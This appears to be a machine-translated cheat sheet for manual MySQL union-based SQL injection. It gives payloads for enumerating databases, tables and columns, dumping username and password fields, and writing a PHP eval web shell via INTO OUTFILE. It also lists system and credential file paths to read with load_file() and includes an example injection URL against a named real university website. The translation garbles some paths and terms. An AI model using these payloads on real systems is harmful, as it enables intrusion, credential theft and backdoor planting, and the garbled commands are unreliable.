Violent Field Length
Order by num /*
Matching Field
And 1 = 1 union select 1, 2, 4, 5 ....... N /*
Violent field location
And 1 = 2 union select 1, 2, 3, 4, 5 ..... N /*
Using built-in function brute-force database information
Version () database () user ()
You do not need to guess the available field brute-force database information (some websites are not applicable ):
And 1 = 2 union all select version ()/*
And 1 = 2 union all select database ()/*
And 1 = 2 union all select user ()/*
Operating system information:
And 1 = 2 union all select @ global. version_compile_ OS from mysql. user /*
Database permissions:
And ord (mid (user (), 114) =/* return normal description as root
Brute-force database (mysql> 5.0)
Mysql 5 and above have the built-in database information_schema, which stores all the database and table structure information of mysql.
And 1 = 2 union select 1, 2, 3, SCHEMA_NAME, 5, 6, 7, 8, 9, 10 from information_schema.SCHEMATA limit 0, 1
Guess table
And 1 = 2 union select 1, 2, 3, TABLE_NAME, 5, 6, 7, 8, 9, 10 from information_schema.TABLES where TABLE_SCHEMA = database (hexadecimal) limit 0 (start record, 0 is the first start record), 1 (display 1 record )-
Guess Field
And 1 = 2 Union select 1, 2, 3, COLUMN_NAME, 5, 6, 7, 8, 9, 10 from information_schema.COLUMNS where TABLE_NAME = table name (hexadecimal) limit 0, 1
Brute force password
And 1 = 2 Union select 1, 2, 3, username segment, 5, 6, 7, password segment, 8, 9 from table name limit 0, 1
Advanced usage (two data contents are displayed for one available field ):
Union select 1, 2, 3 concat (username segment, 0x3c, password segment), 5, 6, 7, 8, 9 from table name limit 0, 1
Write horse directly (Root permission)
Condition: 1. Know the physical path of the site
2. Have sufficient permissions (you can use select .... From mysql. user test)
3. magic_quotes_gpc () = OFF
Select '<? Php eval ($ _ POST [cmd])?> 'Into outfile' physical Path'
And 1 = 2 union all select one sentence HEX value into outfile 'path'
Load_file () common paths:
1. replace (load_file (0 × 2F6574632F706173737764), 0 × 3c, 0 × 20)
2. replace (load_file (char (47,101,116, 115,115,119,100,), char (60), char (32 ))
The above two items show the full code in a PHP file. Sometimes some characters are not replaced. For example, "<" is replaced with "space" and the webpage is returned. The Code cannot be viewed.
3. load_file (char (47) can be used to list the root directories of FreeBSD and Sunos systems.
4. view the configuration file of the linux APACHE Virtual Host in/etc tpd/conf tpd. conf or/usr/local/apche/conf tpd. conf.
5. Run c: \ Program Files \ Apache Group \ Apache \ conf \ httpd. conf or C: \ apache \ conf \ httpd. conf to view the apache file in WINDOWS.
6. Run c:/Resin-3.0.14/conf/resin. conf to view the resin file configuration of the website developed by jsp.
7. c:/Resin/conf/resin. conf/usr/local/resin/conf/resin. conf
8. d: \ APACHE \ Apache2 \ conf \ httpd. conf
9. C: \ Program Files \ mysql \ my. ini
10../themes/darkblue_orange/layout. inc. php phpmyadmin burst path
11. view the virtual host configuration file of IIS in c: \ windows \ system32 \ inetsrv \ MetaBase. xml.
12. view the resin configuration file 3.0.22 in/usr/local/resin-3.0.22/conf/RESIN. conf.
13./usr/local/resin-pro-3.0.22/conf/resin. conf is the same as above.
14./usr/local/app/apache2/conf/extra tpd-vhosts.conf apashe vm View
15. View firewall policies in/etc/sysconfig/iptables.
16. Equivalent settings of usr/local/app/php5 B/php. ini PHP
17./etc/my. cnf MYSQL configuration file
18. System Version of/etc/redhat-release Red Hat
19. C: \ mysql \ data \ mysql \ user. MYD has a user password in the MYSQL system.
20,/etc/sysconfig/network-scripts/ifcfg-eth0 to view the IP.
21./usr/local/app/php5 B/php. ini // PHP settings
22./usr/local/app/apache2/conf/extra tpd-vhosts.conf // virtual website settings
23. C: \ Program Files \ RhinoSoft.com \ Serv-U \ ServUDaemon. ini
24. c: \ windows \ my. ini
25. c: \ boot. ini
Common website configuration files: config. inc. php and config. php. Replace (load_file (HEX), char (60), char (32) must be used for load_file ))
Note:
Char (60) indicates <
Char (32) indicates space
Problems with manual injection:
After the injection, the page displays:
Illegal mix of collations (latin1_swedish_ci, IMPLICIT) and (utf8_general_ci, IMPLICIT) for operation 'Union'
Such as: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? ID = 13% 20and % 201 = 2% 20 union % 20 select % 201, load_file (0x433A5C626F6F742E696E69), 3,4, user () % 20
This is caused by inconsistent pre-and post-encoding,
Solution: Add unhex (hex (parameter) before the parameter. The above URL can be changed:
Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? ID = 13% 20and % 201 = 2% 20 union % 20 select % 201, unhex (hex (load_file (0x433A5C626F6F742E696E69), 3, 4, unhex (hex (user () % 20
You can continue to inject...